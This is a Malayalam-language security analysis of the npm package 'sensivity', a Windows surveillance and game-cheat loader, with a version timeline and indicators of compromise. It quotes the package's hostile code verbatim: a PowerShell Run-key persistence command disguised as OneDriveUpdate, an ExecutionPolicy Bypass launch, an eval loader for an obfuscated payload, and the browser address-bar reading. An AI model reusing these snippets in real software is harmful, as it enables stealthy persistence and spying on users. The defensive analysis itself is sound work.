അച്ചു ഡി.ആർ.
എൻപിഎം പാക്കേജ് സംവേദനക്ഷമത "സെൻസിറ്റിവിറ്റി കൺട്രോൾ പാനൽ" എന്ന് സ്വയം വിശേഷിപ്പിക്കുന്നു. വിൻഡോസിൽ ഇത് ഒരു റിമോട്ട് കൺട്രോൾ, നിരീക്ഷണ ഉപകരണമായി പ്രവർത്തിക്കുന്നു.
അതിന്റെ പ്രവേശന കവാടം, launcher.js, സ്വന്തം പ്രക്രിയയെ റൺടൈം ബ്രോക്കർ എന്ന് പുനർനാമകരണം ചെയ്യുന്നു, പേരുള്ള ഒരു ഓട്ടോസ്റ്റാർട്ട് റൺ-കീ മൂല്യം എഴുതുന്നു. OneDriveUpdate മറഞ്ഞിരിക്കുന്ന ഒരു VBScript വഴി പാക്കേജ് വീണ്ടും സമാരംഭിക്കുന്ന, പവർഷെൽ സൃഷ്ടിക്കുന്ന -ExecutionPolicy Bypass, തുടർന്ന് 6.87 MB നേറ്റീവ് മൊഡ്യൂളിനൊപ്പം 171 KB അവ്യക്തമായ സെർവർ പേലോഡ് വിലയിരുത്തുന്നു, sens.node.
ഇത് TCP പോർട്ട് 3000-ൽ ഒരു ഫോൺ-പെയറിംഗ് കൺട്രോൾ പാനലായി വർത്തിക്കുന്നു. കൂടാതെ Windows UIAutomation വഴി സജീവ ബ്രൗസറിന്റെ വിലാസ-ബാർ URL വായിക്കുകയും ഒരു ഹാർഡ്-കോഡ് ചെയ്ത YouTube വീഡിയോ കാണുകയും ചെയ്യുന്നു.
മുമ്പ് ബ്ലാക്ക് ബോക്സുകളായി വായിച്ചിരുന്ന രണ്ട് ഭാഗങ്ങൾ ഇപ്പോൾ പരിഹരിച്ചു. അവ്യക്തമായ സെർവർ, server.obf.js, ഒരു obfuscator.io RC4 സ്ട്രിംഗ്-അറേ സ്കീം ഉപയോഗിക്കുന്നു; അതിന്റെ ഡീകോഡർ ഓഫ്ലൈനിൽ വീണ്ടും നടപ്പിലാക്കുന്നത് (ജാവാസ്ക്രിപ്റ്റ് എക്സിക്യൂട്ട് ചെയ്തിട്ടില്ല) ഒരൊറ്റ ബാഹ്യ എൻഡ്പോയിന്റ് വീണ്ടെടുക്കുന്നു — https://izopi.com/check.php — ഒപ്പിട്ട ലൈസൻസ് പ്രതികരണങ്ങൾ പരിശോധിക്കാൻ ഉപയോഗിക്കുന്ന ഒരു എംബഡഡ് RSA പബ്ലിക് കീയോടൊപ്പം.
നേറ്റീവ് മൊഡ്യൂൾ, sens.node, പായ്ക്ക് ചെയ്തിട്ടില്ല: അതിന്റെ ഇംപോർട്ട് ടേബിളും എംബഡഡ് സ്ട്രിംഗുകളും ഇതിനെ ഒരു DirectX 11 / Dear ImGui ഇൻ-ഗെയിം ഓവർലേ ആയി തിരിച്ചറിയുന്നു, ഇത് റിമോട്ട്-പ്രോസസ് ഇഞ്ചക്ഷൻ, മെമ്മറി റീഡ്/റൈറ്റ് എന്നിവയാൽ നയിക്കപ്പെടുന്ന aimbot, ESP (വാൾ-ഹാക്ക്), ട്രിഗർബോട്ട് സവിശേഷതകൾ എന്നിവ നൽകുന്നു.
അതിനുള്ളിലെ സ്ട്രിംഗുകൾ GTA V / FiveM ന് അനുസൃതമായ വാഹന എന്റിറ്റികളെയും മാപ്പ് ലൊക്കേഷനുകളെയും പരാമർശിക്കുന്നു. npm പാക്കേജ് ആ നേറ്റീവ് മൊഡ്യൂളിനെ ചുറ്റിപ്പറ്റിയുള്ള ഡെലിവറി, പെർസിസ്റ്റൻസ് റാപ്പറാണ്.
നിർവചിക്കുന്ന സിഗ്നൽ സാങ്കേതികമല്ല, പ്രവർത്തനക്ഷമമാണ്: ഒരു അജ്ഞാത പ്രസാധകൻ ഒരു പാക്കേജിന്റെ ഏകദേശം എഴുപത് പതിപ്പുകൾ പുറത്തിറക്കി — 2.5.0 വഴി 2.5.69 — കുറച്ച് ദിവസങ്ങൾക്കുള്ളിൽ, ഓരോന്നിനും ഒരേ ലോഞ്ചർ ഉണ്ട്.
ഇൻസ്റ്റാൾ ഇല്ല. hooksപാക്കേജ് ആരംഭിക്കുമ്പോൾ മാത്രമേ പേലോഡ് പ്രവർത്തിക്കൂ.
ആക്രമണം: ഇത് എങ്ങനെ പ്രവർത്തിക്കുന്നു
സെൻസിറ്റിവിറ്റി പത്ത് ഫയലുകൾ അയയ്ക്കുന്നു. package.json സ്പേഴ്സാണ്: റിപ്പോസിറ്ററി ഫീൽഡ് ഇല്ല, ലൈസൻസ് ഇല്ല, ഒരു മെയിൻ, രണ്ട് ബിൻ അപരനാമങ്ങൾ (സെൻസിറ്റിവിറ്റി, സെൻസ്) എല്ലാം launcher.js-ലേക്ക് ചൂണ്ടിക്കാണിക്കുന്നു, കൂടാതെ നോഡ് launcher.js-ന്റെ ഒരു സ്റ്റാർട്ട് സ്ക്രിപ്റ്റും. പോസ്റ്റ്ഇൻസ്റ്റാളോ പ്രീഇൻസ്റ്റാളോ ഇല്ല. npm ഇൻസ്റ്റാളിൽ ഒന്നും പ്രവർത്തിക്കുന്നില്ല. ഒരു ഉപയോക്താവ് പാക്കേജ് ആരംഭിക്കുമ്പോൾ താഴെ വിവരിച്ചിരിക്കുന്ന പെരുമാറ്റം പ്രവർത്തിക്കുന്നു - bin shim, start script, അല്ലെങ്കിൽ a require വഴി.
ടാർബോളിൽ ലോഞ്ചർ, ഒരു അവ്യക്തമായ സെർവർ, നേറ്റീവ് മൊഡ്യൂൾ, ഒരു വിഷ്വൽ ബേസിക് സ്ക്രിപ്റ്റ്, കൺട്രോൾ പാനലിനായുള്ള ഒരു പബ്ലിക്/വെബ് ഡയറക്ടറി എന്നിവ ഉൾപ്പെടുന്നു. launcher.js എന്നത് വായിക്കാവുന്ന ഓർക്കസ്ട്രേറ്ററാണ്; റൺടൈമിൽ പ്രാധാന്യമുള്ള ലോജിക്ക് അത് ലോഡ് ചെയ്യുന്ന രണ്ട് ബ്ലോഗുകളിലാണ് - ഒരു അവ്യക്തമായ സെർവറും ഒരു കംപൈൽ ചെയ്ത നേറ്റീവ് മൊഡ്യൂളും, രണ്ടും താഴെ പരിഹരിച്ചു.
പ്രോസസ്സ് മാസ്കറേഡും വ്യാജമായ ഒരു OneDrive അപ്ഡേറ്ററും
ആദ്യകാല എക്സിക്യൂഷൻ launcher.js സ്വന്തം പ്രോസസ്സ് നാമം രണ്ടുതവണ സജ്ജമാക്കുന്നു:
javascript process.title = 'Runtime Broker'; റൺടൈം ബ്രോക്കർ ആപ്പ് അനുമതികൾ മധ്യസ്ഥമാക്കുന്ന ഒരു നിയമാനുസൃത വിൻഡോസ് പ്രോസസ്സ് (RuntimeBroker.exe) ആണ്. ഒരു നോഡ് പ്രോസസ്സിന് അതിനോട് പൊരുത്തപ്പെടുന്ന രീതിയിൽ പേര് മാറ്റുന്നത് ടാസ്ക് മാനേജറിൽ പെട്ടെന്ന് നോക്കുന്നതിൽ അസാധാരണമായ ഒന്നും കാണിക്കില്ല എന്നാണ്.
നേരിട്ടുള്ള രജിസ്ട്രി API വഴിയല്ല, പവർഷെൽ വഴിയാണ് പെർസിസ്റ്റൻസ് എഴുതുന്നത്:
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); ഓട്ടോസ്റ്റാർട്ട് മൂല്യത്തിന് OneDriveUpdate എന്ന് പേരിട്ടിരിക്കുന്നു, അത് നേരിട്ട് പാക്കേജിലേക്ക് വിരൽ ചൂണ്ടുന്നില്ല. ബണ്ടിൽ ചെയ്ത OneDrive.Standalone.Updater.vbs പ്രവർത്തിപ്പിക്കുന്ന wscript.exe-ലേക്ക് ഇത് വിരൽ ചൂണ്ടുന്നു. ആ സ്ക്രിപ്റ്റ് ഒരു മറഞ്ഞിരിക്കുന്ന വിൻഡോയിൽ നോഡ് launcher.js വീണ്ടും സമാരംഭിക്കുന്നു. റൺ-കീ നാമവും VBScript ഫയൽ നാമവും മൈക്രോസോഫ്റ്റ് ബ്രാൻഡിംഗ് കടമെടുക്കുന്നു, അതിനാൽ ഓട്ടോസ്റ്റാർട്ട് എൻട്രി ഒരു പതിവ് OneDrive ടാസ്ക് ആയി വായിക്കുന്നു.
എക്സിക്യൂഷൻ-പോളിസി ബൈപാസുള്ള പവർഷെൽ
ലോഞ്ചർ പവർഷെല്ലിലേക്ക് ആവർത്തിച്ച് ഷെൽ ചെയ്യുന്നു. സ്കാനറുകൾ നിർണായകമെന്ന് ഫ്ലാഗ് ചെയ്യുന്ന സിങ്ക് എക്സിക്യൂഷൻ പോളിസി പ്രവർത്തനരഹിതമാക്കി ജനറേറ്റ് ചെയ്ത .ps1 ന്റെ ലോഞ്ചാണ്:
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); ആ ഇൻവോക്കേഷനു വേണ്ടിയുള്ള ലോക്കൽ സ്ക്രിപ്റ്റ്-സൈനിംഗ് പരിശോധന എക്സിക്യൂഷൻ പോളിസി ബൈപാസ് നീക്കം ചെയ്യുന്നു. ജനറേറ്റ് ചെയ്ത സ്ക്രിപ്റ്റുകൾ അടുത്ത വിഭാഗത്തിൽ വിവരിച്ചിരിക്കുന്ന ബ്രൗസർ-സർവൈലൻസും വിൻഡോ-ഡിറ്റക്ഷൻ ജോലിയും കൈകാര്യം ചെയ്യുന്നു.
അവ്യക്തമായ സെർവറും നേറ്റീവ് മൊഡ്യൂളും
സജ്ജീകരിച്ചതിനുശേഷം, launcher.js അതിന്റെ യഥാർത്ഥ പേലോഡ് ലോഡ് ചെയ്യുകയും എക്സിക്യൂട്ട് ചെയ്യുകയും ചെയ്യുന്നു:
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js എന്നത് 171 KB _0x-array obfuscation ആണ് — ഓരോ സ്ട്രിംഗും ഐഡന്റിഫയറും ഒരു സൂചിക ഉപയോഗിച്ച് ഷഫിൾ ചെയ്ത അറേയിലേക്ക് മാറ്റിസ്ഥാപിക്കുകയും, തുടർന്ന് റൺടൈമിൽ ഡീ-റഫറൻസ് ചെയ്യുകയും ചെയ്യുന്ന JavaScript പാറ്റേൺ ആണ്. obfuscator.io നിർമ്മിക്കുന്ന RC4 വേരിയന്റാണ് ഈ സ്കീം: ഒരൊറ്റ ഡീകോഡർ ഫംഗ്ഷൻ base64-ഒരു അറേ എൻട്രി ഡീകോഡ് ചെയ്യുകയും തുടർന്ന് ഒരു പെർ-കോൾ കീ ഉപയോഗിച്ച് RC4-ഡീക്രിപ്റ്റ് ചെയ്യുകയും ചെയ്യുന്നു. ആ ഡീകോഡർ ഒരു പ്രത്യേക സ്ക്രിപ്റ്റിൽ വീണ്ടും നടപ്പിലാക്കുന്നു — പാക്കേജിന്റെ സ്വന്തം ജാവാസ്ക്രിപ്റ്റ് അല്ല, എക്സ്ട്രാക്റ്റുചെയ്ത 821-എൻട്രി സ്ട്രിംഗ് അറേയിൽ വീണ്ടും നടപ്പിലാക്കൽ മാത്രം പ്രവർത്തിപ്പിക്കുന്നു — അത് വൃത്തിയായി അൺവൈൻഡ് ചെയ്യുന്നു. ഏത് ഉപരിതലങ്ങളാണ് മിതമായത്, പക്ഷേ decisive: ഒരു LICENSE_URL സ്ഥിരാങ്കത്തിലേക്ക് നിയോഗിച്ചിട്ടുള്ള ഒരു ബാഹ്യ URL, https://izopi.com/check.php`; ഒരു എംബഡഡ് RSA PUBLIC_KEY_PEM`; ലോക്കൽ പാനൽ /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, /trigger/status എന്നിവ റൂട്ട് ചെയ്യുന്നു; child_process, crypto, [Sensivity] sens.node എന്നീ സ്ട്രിംഗുകൾ ലോഡ് ചെയ്യുന്നു — അവസാനത്തേത് ലോഞ്ചർ ലോഡുചെയ്ത പ്രോഗ്രാം മൊഡ്യൂളിലേക്ക് മാറ്റിയെഴുതുന്ന കൃത്യമായ ലോഗ് ലൈൻ ആണ്. എൻഡ്പോയിന്റ് ഒരു ലൈസൻസ് പരിശോധനയാണ്: ക്ലയന്റ് ഒരു ഐഡന്റിഫയർ പോസ്റ്റ് ചെയ്യുന്നു (ഒബ്ഫസ്കേറ്റഡ് സെർവർ ഒരു ഡിസ്കോർഡ് ഐഡി ഫോർമാറ്റ് ചെയ്യുന്നു: %s സ്ട്രിംഗ്) കൂടാതെ RSA കീ സെർവറിന്റെ ഒപ്പിട്ട പ്രതികരണം പരിശോധിക്കുന്നു.
sens.node എന്നത് 6.87 MB കംപൈൽ ചെയ്ത നേറ്റീവ് ആഡ്ഓൺ ആണ്, ഇത് പാക്ക് ചെയ്തിട്ടില്ല — സെക്ഷൻ എൻട്രോപ്പി 5.6–6.6 ആണ്, കൂടാതെ PE ഇമ്പോർട്ട്, എക്സ്പോർട്ട് ടേബിളുകൾ കേടുകൂടാതെയിരിക്കും, അതിനാൽ അതിന്റെ കഴിവുകൾ നേരിട്ട് വായിക്കാൻ കഴിയും. ഇത് napi_register_module_v1 കയറ്റുമതി ചെയ്യുന്നു, standard നോഡ് N-API എൻട്രി പോയിന്റ്, അതിനാൽ eval'd സെർവർ ഒരു പ്ലെയിൻ റിക്വയർ ഉപയോഗിച്ച് അത് ലോഡ് ചെയ്യുന്നു. അതിന്റെ ഇറക്കുമതി പട്ടികയാണ് ടെൽ. KERNEL32-ൽ നിന്ന് ഇത് OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, Process32First/NextW എന്നിവ പിൻവലിക്കുന്നു - മറ്റൊരു പ്രോസസ്സ് കണ്ടെത്തുന്നതിനും അതിനുള്ളിൽ മെമ്മറി അനുവദിക്കുന്നതിനും ആ മെമ്മറി വായിക്കുന്നതിനോ എഴുതുന്നതിനോ ഉള്ള കാനോനിക്കൽ സെറ്റ്. USER32-ൽ നിന്ന് ഇത് GetAsyncKeyState, GetKeyState, mouse_event, SetCursorPos എന്നിവ പിൻവലിക്കുന്നു; ഇത് ഓൺ-സ്ക്രീൻ ഓവർലേയ്ക്കായി d3d11.dll, D3DCOMPILER_43, dwmapi എന്നിവയെയും നെറ്റ്വർക്ക് കോളുകൾക്കായുള്ള പൂർണ്ണ WINHTTP സെറ്റിനെയും ബന്ധിപ്പിക്കുന്നു. ഇതിന്റെ ഉൾച്ചേർത്ത സ്ട്രിംഗുകൾ അവ്യക്തതയില്ലാതെ ഫീച്ചർ സെറ്റിന് പേരിടുന്നു: Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected, Dear ImGui ബാനർ Dear ImGui 1.91.3 WIP എന്നിവ പ്രവർത്തനക്ഷമമാക്കുക. ഗ്രേപ്സീഡ് മെഡിക്കൽ ക്ലിനിക്, വെഹിക്കിൾ-ESP പദാവലി പോലുള്ള ലൊക്കേഷനും എന്റിറ്റി സ്ട്രിംഗുകളും GTA V / FiveM-മായി പൊരുത്തപ്പെടുന്നു.
ഫലത്തിൽ ഈ വിഭജനം മനഃപൂർവ്വം ചെയ്തതാണ്: റീഡബിൾ ലോഞ്ചർ.ജെഎസിൽ സ്കാനർ എളുപ്പത്തിൽ വായിക്കുന്ന ഭാഗങ്ങൾ മാത്രമേ ഉള്ളൂ - പെർസിസ്റ്റൻസ്, മാസ്കറേഡ്, ഇവാൽ കോൾ തന്നെ - അതേസമയം ഒബ്ഫസ്കേഷൻ ഒരു ബാഹ്യ ഹോസ്റ്റിനെ റൺടൈം കോൺടാക്റ്റുകളെ മറയ്ക്കുന്നു, കൂടാതെ ബൈനറി ഗെയിം-ഓവർലേയും പ്രോസസ്-ഇഞ്ചക്ഷൻ ലോജിക്കും കൈവശം വയ്ക്കുന്നു. ലോഞ്ചർ നേർത്തതും ഓഡിറ്റ് ചെയ്യാവുന്നതുമായ ഷെല്ലാണ്; ഒബ്ഫസ്കേറ്റഡ് സെർവർ നെറ്റ്വർക്ക് ഐഡന്റിറ്റി മറയ്ക്കുന്നു; നേറ്റീവ് മൊഡ്യൂൾ പേലോഡാണ്. ബൈനറിയുടെ ഇറക്കുമതികളും സ്ട്രിംഗുകളും ഞങ്ങൾ വായിച്ചതായി വിവരിക്കുന്നു; അവയിൽ നിന്ന് ഓപ്പറേറ്ററുടെ ഉദ്ദേശ്യം ഞങ്ങൾ അനുമാനിക്കുന്നില്ല.
പോർട്ട് 3000-ൽ ഒരു ഫോൺ-പെയറിംഗ് നിയന്ത്രണ പാനൽ
ലോഞ്ചർ TCP പോർട്ട് 3000-ൽ ഒരു ലോക്കൽ വെബ് സെർവർ കൈകാര്യം ചെയ്യുകയും അതിനെ ഒരു സിംഗിൾടൺ ആയി കണക്കാക്കുകയും ചെയ്യുന്നു. നിലവിലുള്ള ഒരു ലിസണറിനായി ഇത് അന്വേഷിക്കുകയും ബൈൻഡിംഗിന് മുമ്പ് അത് മായ്ക്കുകയും ചെയ്യുന്നു:
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); http://localhost:3000 എന്ന വിലാസത്തിൽ പാനലിലേക്ക് എത്തിച്ചേരാനാകും, http://192.168.1.16:3000 എന്ന ഹാർഡ്-കോഡ് ചെയ്ത LAN ഫോൾബാക്ക് URL ഉം ഇതിൽ ലഭ്യമാണ്. പബ്ലിക്/ ഡയറക്ടറിയും പാനലിന്റെ പെരുമാറ്റവും ഒരു QR-പെയറിംഗ് ഫ്ലോയുമായി പൊരുത്തപ്പെടുന്നു: ഒരു ഫോൺ ഒരു കോഡ് സ്കാൻ ചെയ്യുകയും ഒരു റിമോട്ടായി ഹോസ്റ്റുമായി ബന്ധിപ്പിക്കുകയും ചെയ്യുന്നു. ലോഞ്ചറിൽ ക്ലിയർടെക്സ്റ്റിൽ ഒരു ബാഹ്യ കമാൻഡ്-ആൻഡ്-കൺട്രോൾ ഡൊമെയ്നും ദൃശ്യമാകില്ല - എന്നാൽ, മുകളിലുള്ള ഡീബ്ഫസ്കേഷൻ കാണിക്കുന്നത് പോലെ, ഒന്ന് ഒബ്ഫസ്കേറ്റഡ് സെർവറിൽ ഉണ്ട്: izopi.com ലൈസൻസ് എൻഡ്പോയിന്റ്. പാനൽ തന്നെ ലോക്കലും LAN-സ്കോപ്പ് ചെയ്തതുമാണ്; ഔട്ട്ബൗണ്ട് ഹോസ്റ്റ് മാത്രമാണ് ലൈസൻസ് പരിശോധന.
ഒരു വേർപിരിഞ്ഞ സൂപ്പർവൈസർ/വർക്കർ മോഡൽ പ്രക്രിയയെ സജീവമായി നിലനിർത്തുന്നു. ലോഞ്ചർ SENSIVITY_SUPERVISOR, SENSIVITY_WORKER പരിസ്ഥിതി ഫ്ലാഗുകൾ ഉപയോഗിച്ച് സ്വയം വീണ്ടും രൂപം കൊള്ളുന്നു, ഓരോ കുട്ടിയും മറഞ്ഞിരിക്കുന്നു, അതിനാൽ ഒരു പ്രോസസ്സ് ഇല്ലാതാക്കുന്നത് ഒരു വാച്ച്ഡോഗിന് അത് പുനരാരംഭിക്കാനുള്ള ചുമതല നൽകുന്നു.
ബ്രൗസർ നിരീക്ഷണവും YouTube സിഗ്നലും
ഏറ്റവും കൃത്യമായ പെരുമാറ്റരീതി ബ്രൗസർ നിരീക്ഷണമാണ്. launcher.js, പ്രവർത്തിക്കുന്ന ബ്രൗസറിന്റെ വിലാസ ബാർ വായിക്കാൻ Windows UIAutomation-നെ നയിക്കുന്ന പവർഷെൽ നിർമ്മിക്കുന്നു:
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ഒരു UI എലമെന്റിന്റെ ടെക്സ്റ്റ് ഉള്ളടക്കം ValuePattern തിരികെ നൽകുന്നു. ഒരു ബ്രൗസറിന്റെ വിലാസ-ബാർ എഡിറ്റ് നിയന്ത്രണത്തിൽ പ്രയോഗിച്ചാൽ, ബ്രൗസർ എക്സ്റ്റൻഷൻ ഇല്ലാതെ, ഡിസ്കിലെ പ്രൊഫൈലിൽ സ്പർശിക്കാതെ, API ഹുക്ക് ഇല്ലാതെ ഇര നിലവിൽ കാണുന്ന URL തിരികെ നൽകുന്നു. ജനറേറ്റ് ചെയ്ത സ്ക്രിപ്റ്റ് ഒരു $browserNames ലിസ്റ്റ് ആവർത്തിക്കുകയും ഏത് ബ്രൗസറാണോ അതിന്റെ URL അല്ലെങ്കിൽ വിൻഡോ ശീർഷകം എക്സ്ട്രാക്റ്റ് ചെയ്യുകയും ചെയ്യുന്നു.
ആ URL ഒരൊറ്റ ഹാർഡ്-കോഡ് ചെയ്ത ലക്ഷ്യത്തിനെതിരെ പരീക്ഷിച്ചു:
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; YouTube കാണിക്കുന്ന ബ്രൗസർ വിൻഡോയ്ക്കായി മൂന്ന് സെക്കൻഡ് ദൈർഘ്യമുള്ള ഒരു ലൂപ്പിൽ ലോഞ്ചർ പോൾ ചെയ്യുന്നു, ജനറേറ്റ് ചെയ്ത പവർഷെല്ലിൽ ആ വീഡിയോ ഐഡിയുമായി പൊരുത്തപ്പെടുന്ന ഒരു Get-YouTubeBrowser / Test-TargetYouTubeUrl ജോഡി ഉണ്ട്. നിരീക്ഷിക്കാവുന്ന പ്രഭാവം ഇരട്ടിയാണ്: സജീവ ബ്രൗസിംഗ് URL ഇരയുടെ സ്ക്രീനിൽ നിന്ന് വായിക്കുകയും ഒരു പ്രത്യേക YouTube വീഡിയോയുമായുള്ള ഹോസ്റ്റിന്റെ ഇടപെടൽ കണ്ടെത്തുകയും ചെയ്യുന്നു. മെക്കാനിസവും ലക്ഷ്യവും ഞങ്ങൾ വിവരിക്കുന്നു; അവയിൽ നിന്ന് ഞങ്ങൾ ഒരു ഉദ്ദേശ്യവും അനുമാനിക്കുന്നില്ല.
വിലാസ ബാറിൽ വായിക്കുന്നത് സ്കാനർ sensitive_data_enumeration എന്ന് ലേബൽ ചെയ്യുന്നതാണ് - ഒരു നെറ്റ്വർക്ക്-പ്രാപ്തമായ റൺടൈം നൽകുന്ന ഒരു Process::env ഉം UIAutomation സ്രോതസ്സും. ഇത് ഒറ്റപ്പെട്ട നിലയിൽ സൗമ്യമായി കാണപ്പെടുന്നു, കൂടാതെ UIAutomation ഉറവിടത്തിൽ നിന്ന് അവ്യക്തമായ സെർവറിലേക്ക് ഡാറ്റ ലൈഫ് സൈക്കിൾ ട്രെയ്സ് ചെയ്തുകഴിഞ്ഞാൽ മാത്രമേ നിരീക്ഷണത്തിലേക്ക് മാറുകയുള്ളൂ.
ടൈംലൈനും പതിപ്പ് പരിണാമവും
സെൻസിറ്റിവിറ്റി ഒറ്റയടിക്ക് അപ്ലോഡ് ചെയ്യാൻ കഴിയുന്ന ഒന്നല്ല. പ്രസാധക അക്കൗണ്ടിൽ ഈ ഒറ്റ പാക്കേജിന്റെ ഏകദേശം എഴുപത് പ്രസിദ്ധീകരിച്ച പതിപ്പുകളുണ്ട്, കൂടാതെ അവലോകന വിൻഡോയ്ക്കിടെ പുതിയവ വന്നുകൊണ്ടിരുന്നു. ലോഞ്ചർ 2.5.x ലൈനിലുടനീളം ഫീച്ചർ അനുസരിച്ച് ഫീച്ചർ വികസിപ്പിക്കുന്നു, അതേസമയം അതിന്റെ സ്ഥിരതയും പേലോഡ്-ലോഡിംഗും സ്ഥിരമായി തുടരുന്നു.
| തീയതി (UTC) | നിരീക്ഷിച്ച പതിപ്പുകൾ | ലോഞ്ചർ നില |
|---|---|---|
| 2026-06-02 | 2.5.8 - 2.5.46 (25) | ബേസ് QR-പാനൽ ലോഞ്ചർ; റൺ-കീ പെർസിസ്റ്റൻസ്; അവ്യക്തമായ സെർവറിന്റെ വിലയിരുത്തൽ. |
| 2026-06-03 | 2.5.53 - 2.5.61 (6) | അതേ ഫിംഗർപ്രിന്റ്; കൺസോൾ-ട്രേസ് സപ്രഷൻ. |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | പിൻ ചെയ്ത YouTube ഇടപെടൽ ലക്ഷ്യം ചേർക്കുന്നു wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 - 2.5.69 (24) | ശ്രേണിയിലുടനീളം വിടവ് നികത്തൽ പുനഃപ്രസിദ്ധീകരണം; സൂപ്പർവൈസർ/തൊഴിലാളി വാച്ച്ഡോഗ്. |
ഡൗൺലോഡ് ചെയ്ത പ്രതിനിധികളായ 2.5.0, 2.5.36, 2.5.69 എന്നിവയിലുടനീളം ലോഞ്ചർ വായിക്കുമ്പോൾ നാല് ടയറുകൾ കാണിക്കുന്നു. ആദ്യകാല ബിൽഡുകളിൽ അടിസ്ഥാന QR-പെയറിംഗ് ലോഞ്ചർ ഉണ്ട്. 2.5.33 മുതൽ UIAutomation വിലാസ-ബാർ ഹാർവെസ്റ്റർ ദൃശ്യമാകുന്നു. 2.5.58 മുതൽ ഒരു സൂപ്പർവൈസർ-മാനേജ്മെന്റ് ലെയർ ചേർത്തു. 2.5.64 മുതൽ വേർപെടുത്തിയ സൂപ്പർവൈസർ/വർക്കർ വാച്ച്ഡോഗ് സെറ്റ് പൂർത്തിയാക്കുന്നു. മുഴുവൻ, നാല് കാര്യങ്ങൾ ഒരിക്കലും മാറില്ല: OneDriveUpdate റൺ കീ, OneDrive.Standalone.Updater.vbs ഡ്രോപ്പർ, eval'd server.obf.js, sens.node നേറ്റീവ് മൊഡ്യൂൾ.
ദിവസങ്ങൾക്ക് മുമ്പ് സ്ഥിരീകരിച്ച പതിപ്പുകൾക്ക് താഴെയുള്ള താഴ്ന്ന പതിപ്പ് നമ്പറുകൾ - 2.5.0 മുതൽ 2.5.15 വരെ - പുനഃപ്രസിദ്ധീകരിച്ചതിനാൽ 2026-06-05 തരംഗം ശ്രദ്ധേയമാണ്. ഇഫക്റ്റ് രജിസ്ട്രിയിൽ തുടർച്ചയായ 2.5.x ലൈൻ ആണ്, എല്ലാ പതിപ്പുകളിലും ഒരേ ലോഞ്ചർ ഉണ്ട്.
വിട്ടുവീഴ്ചയുടെ സൂചകങ്ങൾ
താഴെയുള്ള എല്ലാ സൂചകങ്ങളും പാക്കേജ് ടാർബോളിൽ നിന്ന് നേരിട്ട് വായിച്ചതാണ്. റീഡബിൾ ലോഞ്ചറിൽ ലൂപ്പ്ബാക്കും ഒരു സ്വകാര്യ ലാൻ വിലാസവും മാത്രമേ ഉള്ളൂ; server.obf.js ഓഫ്ലൈനിൽ ഡീബ്ഫസ്കേറ്റ് ചെയ്തുകൊണ്ട് izopi.com എന്ന ഒരു ബാഹ്യ ഹോസ്റ്റ്നാമം വീണ്ടെടുത്തു.
| ടൈപ്പ് ചെയ്യുക | സൂചകം | കുറിപ്പുകൾ |
|---|---|---|
| പാക്കേജ് | npm:sensivity (≈70 പതിപ്പുകൾ, 2.5.0-2.5.69) | സിംഗിൾ-പാക്കേജ് പ്രസാധകൻ; സംഭരണി ഇല്ല; ലൈസൻസില്ല. |
| ഫയല് | launcher.js | വായിക്കാവുന്ന ഓർക്കസ്ട്രേറ്റർ; മെയിൻ, ബിൻ ടാർഗെറ്റ്. |
| ഫയല് | server.obf.js (≈171 കെ.ബി.) | obfuscator.io RC4 സ്ട്രിംഗ്-അറേ പേലോഡ്, ലോഡ് ചെയ്തത് വഴി eval(fs.readFileSync(...)). |
| ഫയല് | sens.node (≈6.87 എംബി) | PE32+ x86-64 നോഡ് N-API ആഡ്ഓൺ; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| ഫയല് | OneDrive.Standalone.Updater.vbs | മറച്ച റീലോഞ്ചർ (node launcher.js). |
| നെറ്റ്വർക്ക് | https://izopi.com/check.php | അവ്യക്തമാക്കിയ സെർവറിൽ നിന്ന് ലൈസൻസ്/ഓഥ് എൻഡ്പോയിന്റ് വീണ്ടെടുത്തു; എംബഡഡ് RSA പബ്ലിക് കീ പ്രതികരണങ്ങൾ പരിശോധിക്കുന്നു. |
| കഴിവ് | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | റിമോട്ട്-പ്രോസസ് ഇഞ്ചക്ഷൻ, മെമ്മറി റീഡ്/റൈറ്റ് ശേഷി. |
| കഴിവ് | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | എയിംബോട്ട്, ഇഎസ്പി, ട്രിഗർബോട്ട് സവിശേഷതകൾ നടപ്പിലാക്കുന്ന ഡയറക്റ്റ്എക്സ് 11 / ഇഎംഗുയി ഗെയിം ഓവർലേ. |
| രജിസ്ട്രി | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | ഓട്ടോസ്റ്റാർട്ട് മൂല്യം സൂചിപ്പിക്കുന്നത് wscript.exe കൂടാതെ VBScript ലോഞ്ചറും. |
| പ്രോസസ്സ് | process.title = 'Runtime Broker' | നിയമാനുസൃതമായ വിൻഡോസ് റൺടൈം ബ്രോക്കർ പ്രക്രിയയായി വേഷംമാറി. |
